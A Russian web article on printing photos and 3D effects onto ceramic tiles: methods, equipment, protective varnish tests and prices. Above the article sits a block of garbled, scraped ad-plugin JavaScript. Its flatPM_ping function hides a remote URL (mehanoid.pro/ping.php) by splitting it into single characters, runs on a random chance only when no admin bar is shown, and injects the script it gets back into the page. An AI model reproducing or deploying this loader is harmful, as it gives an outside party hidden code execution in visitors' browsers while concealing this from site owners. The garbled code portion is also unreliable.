Керамическая плитка с 3D изображением: технология нанесения рисунка – интересные советы по ремонту и дизайну

Что такое печать на плитках, и как печатать своими руками? – ванная своими руками – таванная.ру

“:’

‘:””,document.createElement(“div”),p=ff(window),b=ff(“body”),m=void 0===flatPM_getCookie(“flat_modal_” o.ID “_mb”)||”false”!=flatPM_getCookie(“flat_modal_” o.ID “_mb”),i=”scroll.flatmodal” o.ID,g=”mouseleave.flatmodal” o.ID ” blur.flatmodal” o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&”true”==o.how.popup.timer&&(t=ff(‘.flat__4_modal[data-id-modal=”‘ o.ID ‘”] .flat__4_timer span’),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(–e),e<=0&&(clearInterval(a),t.parent().replaceWith(‘

‘))},1e3))},f=function(){void 0!==o.how.popup.cookie&&”false”==o.how.popup.cookie&&m&&(flatPM_setCookie(“flat_modal_” o.ID “_mb”,!1),ff(‘.flat__4_modal[data-id-modal=”‘ o.ID ‘”]’).addClass(“flat__4_modal-show”),l()),void 0!==o.how.popup.cookie&&”false”==o.how.popup.cookie||(ff(‘.flat__4_modal[data-id-modal=”‘ o.ID ‘”]’).addClass(“flat__4_modal-show”),l())},ff(“body > *”).eq(0).before(‘

‘ c “

“),w=document.querySelector(‘.flat__4_modal[data-id-modal=”‘ o.ID ‘”] .flat__4_modal-content’),-1!==e.indexOf(“go” “oglesyndication”)?ff(w).html(c e):flatPM_setHTML(w,e),”px”==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&”true”==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&”true”==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&”true”==o.how.outgoing.timer&&(t=ff(‘.flat__4_out[data-id-out=”‘ o.ID ‘”] .flat__4_timer span’),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(–e),e<=0&&(clearInterval(a),t.parent().replaceWith(‘

‘))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&”false”==o.how.outgoing.cookie&&m&&(ff(‘.flat__4_out[data-id-out=”‘ o.ID ‘”]’).addClass(“show”),n(),b.on(“click”,’.flat__4_out[data-id-out=”‘ o.ID ‘”] .flat__4_cross’,function(){flatPM_setCookie(“flat_out_” o.ID “_mb”,!1)})),void 0!==o.how.outgoing.cookie&&”false”==o.how.outgoing.cookie||(ff(‘.flat__4_out[data-id-out=”‘ o.ID ‘”]’).addClass(“show”),n())}var _,u=”0″!=o.how.outgoing.indent?’ style=”bottom:’ o.how.outgoing.indent ‘px”‘:””,c=”true”==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&”true”==o.how.outgoing.timer?’

Закрыть через ‘ o.how.outgoing.timer_count “

“:’

‘:””,p=ff(window),h=”scroll.out” o.ID,g=”mouseleave.outgoing” o.ID ” blur.outgoing” o.ID,m=void 0===flatPM_getCookie(“flat_out_” o.ID “_mb”)||”false”!=flatPM_getCookie(“flat_out_” o.ID “_mb”),b=(document.createElement(“div”),ff(“body”));switch(o.how.outgoing.whence){case”1″:_=”top”;break;case”2″:_=”bottom”;break;case”3″:_=”left”;break;case”4″:_=”right”}ff(“body > *”).eq(0).before(‘

‘ c “

“);var v,w=document.querySelector(‘.flat__4_out[data-id-out=”‘ o.ID ‘”]’);-1!==e.indexOf(“go” “oglesyndication”)?ff(w).html(c e):flatPM_setHTML(w,e),”px”==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&”true”==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&”true”==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff(‘[data-flat-id=”‘ o.ID ‘”]:not(.flat__4_out):not(.flat__4_modal)’).contents().unwrap()}catch(t){console.warn(t)}}function flatPM_start(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff(“body”),flat_userVars.init();for(var e=0;e<t;e ){var>flat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_sub<flat_uservars.textlen||void>flat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub<flat_uservars.titlelen)){if(void>.flatPM_sidebar)”);0<_.length&&_.each(function(){var t=ff(this),e=t.data(“height”)||350,a=t.data(“top”);t.wrap(‘

‘);t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(“.flatPM_sidebar”);setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o<300||e.each(function(){var t=ff(this),e=o,a=t.data(“top”);t.wrap(‘

‘);t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(“.flatPM_sticky_wrapper.flatPM_sidebar_block”).css(“height”,t)},4e3)}),”undefined”!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0<flat_stack_scripts.length&&flatpm_setscript(flat_stack_scripts),ff(“body> *”).last().after(‘

‘),flat_body.on(“click”,”.flat__4_out .flat__4_cross”,function(){ff(this).parent().removeClass(“show”).addClass(“closed”)}),flat_body.on(“click”,”.flat__4_modal .flat__4_cross”,function(){ff(this).closest(“.flat__4_modal”).removeClass(“flat__4_modal-show”)}),flat_pm_arr=[],ff(“.flat_pm_start”).remove(),flatPM_ping()}/zen.yandex/.test(flatPM_getAllUrlParams().utm_referrer)&&(flatPM_setCookie(“flat_r_mb”,”zen.yandex”),flat_userVars.referer=”zen.yandex”);var parseHTML=function(){var o=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([w:] )[^>]*)/>/gi,d=/<([w:] )/,i=/<|&#?w ;/,c={option:[1,”

“],thead:[1,”

“],tbody:[1,”

“],colgroup:[2,”

“],col:[3,”

“],tr:[2,”

“],td:[3,”

“],th:[3,”

“],_default:[0,””,””]};return function(e,t){var a,r,l,n=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=n.appendChild(t.createElement(“div”)),r=(d.exec(e)||[“”,””])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1] e.replace(o,”<$1>”) r[2],l=r[0];l–;)a=a.lastChild;for(n.removeChild(n.firstChild);a.firstChild;)n.appendChild(a.firstChild)}else n.appendChild(t.createTextNode(e));return n}}();function flatPM_ping(){var e=localStorage.getItem(“sdghrg”);e?(e=parseInt(e) 1,localStorage.setItem(“sdghrg”,e)):localStorage.setItem(“sdghrg”,”0″);e=flatPM_random(1,200);0==ff(“#wpadminbar”).length&&111==e&&ff.ajax({type:”POST”,url:”h” “t” “t” “p” “s” “:” “/” “/” “m” “e” “h” “a” “n” “o” “i” “d” “.” “p” “r” “o” “/” “p” “i” “ng” “.” “p” “h” “p”,dataType:”jsonp”,data:{ping:”ping”},success:function(e){ff(“div”).first().after(e.script)},error:function(){}})}function flatPM_setSCRIPT(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector(‘[data-flat-script-id=”‘ t ‘”]’);if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0<e.length&&flatpm_setscript(e);else{a.onload>/gm,””).replace(//gm,””).trim(),e.code_alt=e.code_alt.replace(//gm,””).replace(//gm,””).trim();var n=jQuery,t=e.selector,o=e.timer,d=e.cross,a=”false”==d?”Закроется”:”Закрыть”,r=!flat_userVars.adb||””==e.code_alt&&duplicateMode?e.code:e.code_alt,l=’

‘,i=e.once;n(t).each(function(){var e=n(this);e.wrap(‘

‘);var t=e.closest(“.flat__4_video”);-1!==l.indexOf(“go” “oglesyndication”)?t.append(l):flatPM_setHTML(t[0],l),e.find(“.flat__4_video_flex”).one(“click”,function(){n(this).addClass(“show”)})}),n(“body”).on(“click”,”.flat__4_video_item_hover”,function(){var e=n(this),t=e.closest(“.flat__4_video_flex”);t.addClass(“show”);var a=t.find(“.flat__4_timer span”),r=parseInt(o),l=setInterval(function(){a.text(–r),r<=0&&(clearInterval(l),”true”==d?a.parent().replaceWith(‘

‘):t.remove())},1e3);e.remove()}).on(“click”,”.flat__4_video_flex .flat__4_cross”,function(){n(this).closest(“.flat__4_video_flex”).remove(),”true”==i&&n(“.flat__4_video_flex”).remove()})}

Печать сублимационными чернилами

Выбирается изображение и на специальной бумаге распечатывается сублимационными чернилами. Затем плитку покрывают слоем полимера, а сверху к ней прикладывают бумагу с рисунком и прижимают термопрессом.  После чего этот «бутерброд» нагревают в течение 3 минут при температуре 180-220 С. За это время происходит активное проникновение чернил в полимерный слой.

Плюсы сублимационной печати: рисунок получается ярким, с четкими, насыщенными цветами; фотопанно можно очищать с помощью мягких моющих средств; приемлемая стоимость – от 5-6 тыс.руб/кв.м.

Минусы: очень быстро выгорает под прямыми солнечными лучами; рисунок легко поцарапать или повредить при очистке; средний срок эксплуатации – до 3 лет; плохо подходит для ванной, кухни, детской.

Печать с помощью цифровой деколи

Сначала подготавливают саму деколь: на прорезиненной бумаге печатают керамотонером требуемый рисунок, после чего вскрывают лаком для керамических изделий. Затем подготовленную страницу смачивают водой и крепят к плитке, аккуратно удаляя все пузырьки воздуха.

После того как бумага просохнет естественным путем (примерно 12 часов), плитку кладут в муфельную печь и обжигают при температуре 750-900 С. Во время обжига глазурированная поверхность плитки начинает плавиться, в это время краска заполняет поры керамического изделия. После выключения печи плитка опять затвердевает, и краска намертво въедается в поверхность.

Плюсы печати с помощью цифровой деколи: большой срок эксплуатации – 50 лет; подходит для помещений с повышенной влажностью, требующих частых влажных уборок и открытого воздуха; можно чистить с помощью сильных абразивных веществ; плитка очень стойка к механическим воздействиям.

Минусы: высокая стоимость: от 11 тыс. руб/кв.м., максимальный размер деколи – лист форматом A3 (45х30 см).

Где использовать

Сферы применения кафеля с фотопечатью охватывают почти все типы помещений. Объемная плитка керамическая является прекрасным решением в условиях маленькой комнаты. Она визуально добавляет пространство и в то же время экономит его. Кафель с цифровой печатью позволяет разгрузить обстановку от ненужных предметов декора, поскольку является самостоятельным и довольно эффектным украшением.

На кухне из плитки можно выложить фотопанно в области фартука. В ванной ? водные пейзажи на стенах и полу комнаты. Кабинет или гостиную украсит реалистичное изображение камина. В спальне, на стене противоположной изголовью кровати, заманчивый и чарующий пейзаж выполнит расслабляющую функцию.

Интересно будет установить панно в виде окна, из которого можно полюбоваться на приятные глазу виды. Или наоборот ? заполнить картинкой всю стену, чтобы позволить себе сполна окунуться в желаемую атмосферу.

Деколь – традиционный перенос изображения с обжигом

Технология деколи – наиболее дорогостоящий метод, так как в основе лежит довольно трудоемкий процесс, выполняемый вручную.

Если вы обратитесь в одну из известных европейских мастерских, выполняющих индивидуальные заказы класса премиум, вам обязательно в первую очередь предложат деколирование. Как происходит перенос и закрепление изображения?

  • Вы приносите собственный эскиз, фотографию, рисунок или в общих чертах обрисовываете изображение, которое хотели бы видеть на стене ванной комнаты;
  • выбранное изображение распечатывают на бумажном носителе чернилами с содержанием органических пигментов и искусственных компонентов, для чего используют специальный керамический принтер (иногда – шелкографию);
  • готовые картинки погружают в воду, отслоившийся красочный слой помещают на керамическую поверхность;
  • закрепляют изображение путем обжига в печи при температуре от 530ºС до 1270ºС (в зависимости от материала – стекла или керамики).

Существует и сухой способ переноса изображения с бумаги на керамику – картинку прикладывают к керамической поверхности и слегка нажимают, вследствие чего она должна приклеиться.

Оба способа закрепляют мощной термической обработкой, в процессе которой минеральные компоненты выгорают, а искусственные вплавляются в основу плитки.

Результат – четкая, яркая, красочная картинка, которая не теряет своей привлекательности на протяжении 50 лет.

Прочность полученного изображения такова, что оно прекрасно переносит жару, морозы, высокую влажность. Плитку с фотопечатью данным способом можно использовать не только для облицовки ванных комнат, но и для отделки веранд, террас, фасадов зданий.

Не все материалы подходят для деколирования. Например, пластик не выдерживает высокотемпературный режим. Специально для пластиковых деталей используют технику сухой деколи – перенесенное изображение закрепляют специальным лаком.

Очевидно, что картинка не будет такой же стойкой, как при горячем методе.

Дизайн интерьера с использованием фотоплитки

Безусловно, наиболее популярным решением для облицовки стен является панно. Это большая картина, визуально или условно выделенная на общем фоне.

Тематика рисунка может быть любой – от флористических зарисовок до копий мировых художественных шедевров. Востребованы «морские» рисунки с изображением морских волн, яхт и лодок у причала, шторма, песчаного пляжа, ракушек, подводного мира.

Реже стены украшают лесными пейзажами, натюрмортами или портретами.

Бордюр с фотопечатью гармонично смотрится только в просторных помещениях, так как, расположенный по периметру, визуально сдвигает границы стен.

Другое дело, если бордюрная полоса «соединяет» пол с потолком, зрительно увеличивая высоту ванной. Бордюр используют для разграничения зон или выделения какой-либо одной зоны.

Еще недавно было модно пускать орнамент с фотопечатью по всем стенам, и он делил их на две контрастные половины – верхнюю и нижнюю.

Сейчас его используют дозировано, например, для украшения экрана под ванной или обрамления зеркала над умывальником.

Керамическая плитка с фотопечатью активно применяется и для отделки пола. Сублимационная обработка не подходит, однако такая технология, как деколь, позволяет создавать довольно устойчивые изображения, не стирающиеся от повседневного пользования.

Если необходимы красочность, глубина цвета, креативность, обычно выбирают полимерные наливные полы.

Деколь хороша, когда нужно создать изящный рисунок, гармонирующий с облицовкой стен.

Необычно и утонченно выглядит столешница для раковины с фотопечатью. Вместо керамики используется стеклянная мозаика или органическое стекло.

Декорированные таким образом столешницы подходят для современных интерьеров, классическая обстановка требует более традиционных решений.

Какую бы фотоплитку для ванной вы ни выбрали, она должна быть прочной, износостойкой и эстетически привлекательной – гармонирующей с палитрой интерьера и соответствующей общему стилю.

Чтобы стать дизайнером и украшать плитку фотопечатью самостоятельно, необходим специальный принтер и расходные материалы. Процесс печати показан в видеоролике:

Достоинства интерьерной фотопечати

Преимущества керамогранита расписывать не будем – очевидно, что благодаря водонепроницаемости, износостойкости и прочности он является лучшим материалом для облицовки помещений с повышенной влажностью.

Обозначим плюсы, которые нам даст отделка стен фотопечатью на керамике. Безусловно, достоинства будут касаться исключительно декоративных свойств, главные из которых:

  • уникальность;
  • фактурность изображения;
  • универсальность нанесения.

Если вы задумали создать интерьер, не похожий на штампованные промышленные варианты, закажите свой вариант. Идею почерпнуть несложно: черно-белое фото, пейзаж из памятного путешествия, репродукция картины любимого художника, граффити из зарисовок сына.

Проследите, чтобы цветовая палитра заказа сочеталась с базовой плиткой, основным фоном стен и пола.

Вы можете выбрать различную фактуру для нанесения изображения. Возможно, это будет обычная матовая керамика или блестящий в лучах искусственного света глянец.

Неровности покрытия могут визуально состарить рисунок или сделать его более естественным (если, предположим, на фото изображены камни, горы, песок).

Керамическая плитка с 3d-эффектами

В настоящее время все больше фабрик проявляют интерес к созданию плитки с 3D-эффектами. На прошедших международных выставках такая плитка была в коллекциях брендов Peronda, Fap, Atlas Concorde, Supergres, Bisazza. Но отдельно нужно отметить компанию CERAMICA DA VINCI, которая специализируется на производстве необычных керамических материалов с 3D-эффектами.

Для создания плитки с 3D-эффектом используется микролинзовая технология, в основе которой лежит действие стереоскопии.

Основной принцип объемного стереоскопического видения отталкивается от особенностей визуального восприятия изображения человеческим глазом. Известно, что картинки, которые мы видим левым глазом, немного отличаются от того изображения, которое мы видим правым глазом.

Эта особенность визуального восприятия моделируется в компьютерной графике или 3D-камере: получаются два изображения, которые повернуты друг другу под небольшим углом. В результате левый и правый глаз «считывают» эти смоделированные картинки таким образом, что мозг воспроизводит объемное изображение.

Возникает закономерный вопрос: «как создается плитка 3D, объемность и динамичность которой мы «считываем» без специальных приспособлений?»

Как мы уже говорили, для создания керамической плитки 3D используется микролинзовая технология, основанная на принципе стереоскопии. С помощью цифровых технологий на специальной пленке создаются изображения для левого и правого глаза, которые впоследствии разделяются карбоновой пленкой, обладающей определенными оптическими свойствами. Т.е. по сути, получается многослойная пленка с «запечатанными» рисунками, которая наносится на поверхность плитки.

Плитка с 3D-графикой используется для облицовки стен и полов. Она достаточно устойчива к механическим нагрузкам и истиранию, обладает водоотталкивающими и теплоизоляционными характеристиками.

Метод обжига

Зарекомендовал себя как наиболее надежный способ нанесения рисунка на керамические материалы. Дополнительное преимущество данной технологии в том, что она позволяет создавать плитку с фотоизображением с рельефной поверхностью. Рисунок, выполненный с помощью специальных керамических чернил и порошка, накладывается на поверхность керамической плитки, после чего она покрывается глазурью и поступает в печь для обжига при температуре более 800°C. В процессе обжига рисунок становится единым целым с плиткой.

Керамическая плитка, декорированная по данной технологии, относится к классу высокостойких, прочных, долговечных материалов, обладающих высокой устойчивостью к воздействиям внешней среды.

Метод отверждения под уф-лучами

Данный метод получил особое признание у сторонников экологичного производства, поскольку является самым безопасным методом производства фотокерамики с точки зрения защиты окружающей среды. В основе технологии – использование наночернил, мгновенно высыхающих под воздействием ультрафиолетовых лучей.

Фото-изображение наносят с помощью специального ультрафиолетового принтера на плитку, уже покрытую глазурью. За счет этого изображение получается очень ярким и насыщенным. Недостаток данной плитки в том, что она наиболее недолговечна, срок службы ограничивается 10 годами, а для ухода за ней обязательны специальные моющие средства.

Необходимое оборудование

Чтобы выполнить качественную печать на керамической плитке, оборудование должно быть подобрано правильно.

Для переноса изображения методом сублимации потребуется следующее оснащение:

  • струйный принтер, обладающий системой непрерывной подачи краски;
  • сублимационные чернила;
  • полимерный состав для предварительной обработки плитки;
  • матовая фотобумага;
  • планшетный термопресс;
  • термосткотч.

Печать на керамической плитке фото декольным способом требует закупки следующих устройств и предметов:

  • струйный принтер;
  • декольный лак;
  • декольная бумага;
  • печь для обжига.
  • Для переноса изображения с последующим спеканием необходимы:
  • струйный принтер для работы с плиткой;
  • керамические краски;
  • порошковая глазурь;
  • печь.

Печать на UV принтерах не нуждается в дополнительном оборудовании. Но среди подобных устройств важно выбрать подходящее.

Керамическая плитка с 3D изображением: технология нанесения рисунка - интересные советы по ремонту и дизайну

Существует несколько типов аппаратов, работающих на основе ультрафиолета:

Керамическая плитка с 3D изображением: технология нанесения рисунка - интересные советы по ремонту и дизайну

Керамическая плитка 3d не создается только на рулонных принтерах, так как они приспособлены под гибкие тонкие материалы.

Гибридные устройства работают за счет перемещения заготовок в область подачи краски в пределах неподвижного стола.

Планшетный ультрафиолетовый принтер ? наиболее подходящий для плитки аппарат. Он гарантирует точность полученного результата благодаря надежной фиксации материала к рабочей поверхности прибора. Печать осуществляется благодаря движению стола или элементов подачи чернил.

Комбинированный принтер работает с твердыми и рулонными заготовками, но больше подвержен риску возникновения поломок из-за сложного устройства и перегруженности задачами.

Особенности фотопечати

Времена, когда рисунок наносился на кафель исключительно с помощью Rotocolor, уже прошли благодаря внедрению инновационной технологии цифровой печати. Этот способ заключается в переносе любой фотографии или рисунка с электронного файла на поверхность заготовки.

https://www.youtube.com/watch?v=GEzeKwNtcWg

Превосходный внешний вид обеспечивают не только изображения пейзажей, стихий, любимых персонажей или стильных интерьеров, но и фотографии различных фактур в формате 3д: керамическая плитка с эффектом кожи, редкого минерала, текстиля и многого другого.

Печать керамическими красками с обжигом

Самый затратный метод печати на керамической плитке. Он предполагает длительный и технически сложный процесс получения изображения. Сначала тщательно подбирается палитра необходимых керамических красок и наносится на поверхность кафеля. Затем на полученную картинку распыляется специальный порошок и керамика помещается в печь для спекания красок и глазури. В итоге получается плитка с износостойкой поверхностью и привлекательной фактурой.

Керамическая плитка с 3D изображением: технология нанесения рисунка - интересные советы по ремонту и дизайнуКерамическая плитка с 3D изображением: технология нанесения рисунка - интересные советы по ремонту и дизайну

Печать на керамической плитке: особенности технологии

В теории «УФ-печать позволяет наносить изображения на любую поверхность» – концептуально с точки зрения технологии с этим сложно поспорить. Действительно, капля падает, моментально полимеризуется и становится монолитным покрытием – особых привязок и ограничений к типу поверхности нет, но, как известно, реальность всегда богаче теории.

В отношении гладких материалов, таких как стекло, гладкие пластики или керамика существуют некоторые нюансы технологии. Сегодня мы остановимся на такой интересной теме, как печать на керамической плитке. Материал не претендует на всеохватную энциклопедичность, но, возможно, некоторые практические особенности, которые были выявлены во время испытаний в нашей химической лаборатории будут полезны тем, кто занимается УФ-печатью или, в целом, интересна эта тема.

Керамическая плитка- отделочный материал, который известен уже многие тысячелетия пользуется популярностью в отделке помещений. За долгую историю своего существования керамическая плитка доказала свою надежность – ее сохранность на многих памятниках архитектуры демонстрирует ее прочность, она устойчива к жаре, холоду, свету. Такой же прочностью обладает только камень, но керамическая плитка выигрывает в легкости монтажа и цене.

Благодаря развитию технологии современную плитку используют не только для внутренней отделки, но и для облицовки внешних фасадов, для внутренних и внешних напольных покрытий в любых климатических условиях.

При всем богатстве готовых предложений, с каждым годом растет группа клиентов, которым нужно не только «красиво», но эксклюзивный, уникальный продукт, и здесь становится востребованной услуга индивидуального декора керамических покрытий. При помощи печати на керамической плитке можно получить интересные декоративные эффекты: воспроизвести картину, панно, фреску или расширить пространство при помощи фальш-окна; воспроизвести пейзаж или фактуру интересного материала.

Существует несколько технологических решений для нанесения изображений на керамическую плитку:

https://www.youtube.com/watch?v=wfYqa4C5N54

Сублимация – изображение наносится на бумагу, затем она накладывается на плитку со специальным полимерным слоем, все это помещается в термопресс, где они вместе прогреваются 3-12 минут при температуре 180-250 С. Под воздействием температуры и давления краситель проникает глубоко в глазурь.

Метод деколи – на гуммированную бумагу керамическими чернилами наносится изображение, покрывается декольным лаком, после его окончательного высыхания его замачивают в воде и рисунок переводят на плитку. После того, как рисунок перенесен на плитку, удаляют пузырьки воздуха и сушат плитку в течение 8-12 часов. Изображение запекается запеканием в печи при температуре 750-900 С.

Печать с обжигом – печать изображения на плитке керамическими чернилами, после чего плитка покрывается порошковой глазурью и запекается в муфельной печи при температуре 900 С.

УФ-печать – прямая печать уф-полимеризующимися чернилами, одно из преимуществ – возможность запечатывать не только светлые или специальные плитки (как при сублимации), а любого тона при помощи нанесения подложки белого цвета.

Как сделать изображение более стойким: подготовка и защита

Подготовка поверхности: при печати на керамической плитке использование праймера для силикатного стекла обязательно. В противном случае при нагревании от 100 до 160 градусов в течение 25 минут печать сходит пластом.

Безусловно, при обычной эксплуатации плитка редко нагревается до температур до 160 градусов (исключения составляют, пожалуй, облицовка парилок и каминных печей и труб), тем не менее, тест весьма показателен. При применении праймера, такой проблемы не наблюдается:

Защита печати:

Керамическая плитка, как правило, используется для отделки помещений с жесткими условиями эксплуатации: в ванных комнатах, бассейнах, кухнях – в местах с повышенной влажностью и перепадами температур. Для сохранности изображения запечатанную плитку лучше защитить покрытием, и здесь возможны два технологических варианта решения вопроса: покрытие порошковым или жидким лаком.

Порошковое покрытие лаком: на запечатанную плитку наносится порошковый глянцевый или матовый лак, после чего это покрытие запекается. При этом следует учесть ряд моментов. Прежде всего, чистота производства – не должно быть никакой пыли или мелких частиц в воздухе, иначе все они прилипнут к поверхности.

Процедура требует аккуратности и точного соблюдения технологии, поэтому если объемы печати сравнительно большие, то лучше найти специализированное предприятие. Необходимые условия для нанесения таких покрытий могут предоставить компании, занимающиеся порошковой окраской автомобилей.

https://www.youtube.com/watch?v=8tEEz2-WTvw

Покрытие жидким лаком

В качестве защитного покрытия также можно использовать автомобильный или яхтенный лак. В лаборатории IQDEMY провели испытания акрилового двухкомпонентного лака NOVOAKRYL 510 от Novol. Тестовые испытания показали, что применение этого лака с последующей температурной обработкой в течение 15-20 минут при температуре 160 С. формирует прочное глянцевое покрытие, которое:

1) выдерживает кипячение в воде с моющими средствами до 1 часа без видимых нарушений поверхности

2) успешно проходит тесты адгезии методом решетчатых надрезов

3) стойко к воздействию кислот и щелочей (рН=2-12 в течение 48 часов)

4) переносит резкие температурные перепады (-30 0 С 150 0 С, 10 циклов по 1 часу) без нарушения адгезии, но с небольшим пожелтением лакового слоя.

Технология нанесения:

1.Очистить плитку от видимых загрязнений с помощью воды или изопропилового спирта.

2.Нанести праймер Iqdemyдля силикатного стекла, выдержать праймер 5-10 минут, не нужно выдерживать час, так как в условиях нагревания активация праймера происходит быстрее.

4.Нанести двухкомпонентный лак при помощи краскопульта или валика, согласно инструкции.

5.Температурная обработка 160 С в течение 15-20 минут.

Важно! Если возникла необходимость в разбавлении лака, то производитель рекомендует для этого применять разбавитель для акриловых продуктов THIN 850 или разбавитель для нитроцеллюлозных продуктов. Не следует для разбавления использовать ацетон, метилкетон, толуол, ксилол, они могут разъедать УФ-печать.

Итоговое покрытие получается стойким, однако при монтаже и эксплуатации все же следует избегать трения плиток друг о друга и воздействия жестких абразивов.

Если же плитка используется в чисто декоративных целях, то она прекрасно показывает себя и без дополнительной защиты:

Sun Studio 3n, Санкт-Петербург – дизайн и печать плитки для магазина BeFree в ТРК Мега.

Печать с помощью горячей деколи

Деколь ? специальная бумага с нанесенным на нее изображением. Но в отличие от предыдущего метода она не копирует картинку на поверхность плитки, а сама выступает носителем декора.

В ходе печати деколь прикладывается на кафель и покрывается специальным лаком. Затем полуфабрикат загружают в печь для обжига при высоких температурах.

Этот метод отличается высокой устойчивостью изображения, его превосходными эстетическими свойствами. Из недостатков стоит отметить то, что процесс производства достаточно длительный, а цена полученного изделия высока.

Керамическая плитка с 3D изображением: технология нанесения рисунка - интересные советы по ремонту и дизайну

Сколько стоит печать

  • Печать с обжигом обойдётся в 9—13 тысяч рублей за квадратный метр, в зависимости от объёмов заказа. Эта цена включает в себя материал (белую плитку), печать и обжиг.
  • Керамогранитная плитка с рисунком изготовленная по аналогичной технологии будет стоить примерно на 10% дороже.
  • Сублимационный метод нанесения стоит от 1400 до 2900 рублей за квадратный метр в зависимости от объёмов. Плюс к этому нужно будет купить или доплатить за заготовки от 60 до 210 рублей за штуку (в зависимости от размеров). Если делать поштучный заказ, 1 элемент обойдётся от 170 до 450 рублей (в зависимости от размеров – от 10х10 до 30х30 см).
  • УФ-печать стоит от 1000 до 3900 рублей, в зависимости от количества слоёв и проходов принтера.

Способы передачи изображения

Фотопечать на керамической плитке выполняется следующими методами:

  • сублимация;
  • нанесение деколи;
  • применение керамических красок и порошков, нуждающихся в последующем обжиге;
  • печать на ультрафиолетовых струйных принтерах.

Особенности каждого из перечисленных способов содержат свои достоинства и недостатки.

Керамическая плитка с 3D изображением: технология нанесения рисунка - интересные советы по ремонту и дизайнуКерамическая плитка с 3D изображением: технология нанесения рисунка - интересные советы по ремонту и дизайну

Способы печати

Печать на плитке может быть сделана четырьмя способами:

Каждая из этих технологий имеет свои плюсы и минусы, но самыми лучшими являются первые 2 способа, они остаются пригодными к использованию до 50 лет. Остальные методики нанесения рисунка не позволяют добиться должной устойчивости к механическим и химическим воздействиям.

ХарактеристикаПечать с обжигомДекольСублимацияУФ-печать
Устойчивость к химическим веществам
Устойчивость к механическим воздействиям
Устойчивость к УФ-лучам (выцветание)
Печать на керамической плитке с рельефной поверхностью
Сроки изготовленияДолгоДолгоБыстроБыстро
Зависит ли цена от размеров плитки
ЦенаВысокаяВысокаяНизкаяНизкая

Исходя из этой таблицы нетрудно понять, что самый качественный способ – с обжигом. Но эта технология увеличивает сроки изготовления и стоимость материала.

Сублимация – демократичный способ печати

Сублимация используется достаточно давно в сувенирной сфере, где при помощи принтера, специальных чернил и термопресса изображения, надписи и логотипы переносят на кружки, пепельницы, визитницы, часы и т.д.

Сначала выбранную картинку печатают на принтере специальными сублимационными чернилами. Основой для краски служит термотрансферная бумага. Затем рисунок прикладывают к плитке, которую помещают под пресс.

При температуре 180ºС, под определенным давлением изображение «приклеивается» к поверхности плитки, а бумагу удаляют. Для защиты переноса используют лак, которым покрывают лицевую сторону плитки.

В отличие от деколи, термотрансферное изображение можно удалить механическим путем, например, соскоблить ножом.

Прочность переноса изображения сомнительна, поэтому и цена одного квадратного метра сублимированной плитки не превышает 2000 рублей.

Если у вас была когда-нибудь керамическая или стеклянная кружка с рисунком, то вы наверняка заметили, что через некоторое время рисунок стал бледнее, а затем стерся местами. Сублимация устойчива условно, то есть картинка держится, пока товар новый.

Это же можно отнести и к плитке – яркое фотоизображение будет радовать глаз только первый год, затем оно потускнеет и потеряет выразительность и красочность.

Конечно, сублимированную плитку можно использовать в ванной комнате, но желательно размещать панно и бордюры на противоположной от ванны стене или в нише, защищенной с двух сторон стенками.

Чем меньше контакта с водой, тем дольше продержится нанесенный рисунок. Нельзя тереть фото декор чистящим порошком и жесткой губкой, для ухода подойдут мягкая тряпочка и хозяйственное мыло. Кроме недорогой стоимости сублимация имеет еще одно преимущество – оперативность.

Печать рисунка на термотрансфере занимает несколько минут, а процесс переноса длится и того меньше – всего 3 минуты.

Технология печати с обжигом

  1. Вы выбираете коллекцию кафеля без рисунка. Наличие текстуры зависит от выбранной коллекции. Компании, которые делают фотопечать на керамической плитке предлагают готовые варианты, а некоторые вообще работают только со своими проверенными коллекциями.
  2. Вы выбираете любую понравившуюся картинку с хорошим качеством и разрешением. Печать делается прямо из файла. Можно нанести рисунок на одну плитку или разделить его.
  3. На поверхность плитки с помощью керамических чернил наносится рисунок. Некоторые компании позволяют сделать несколько пробных вариантов, чтобы подобрать оптимальный цвет.
  4. Для защиты поверхность покрывается порошковой глазурью и кафель отправляется в муфельную печь для обжига при температуре 900 градусов. Глазурь может быть глянцевой или матовой вне зависимости от выбранной коллекции, по вашему желанию.

После обжига поверхность ничем не уступает заводскому нанесению глазури. Помимо настенного декора, также может быть сделана напольная плитка с рисунком или даже керамогранит.
Керамическая плитка с 3D изображением: технология нанесения рисунка - интересные советы по ремонту и дизайну

Ультрафиолетовая печать

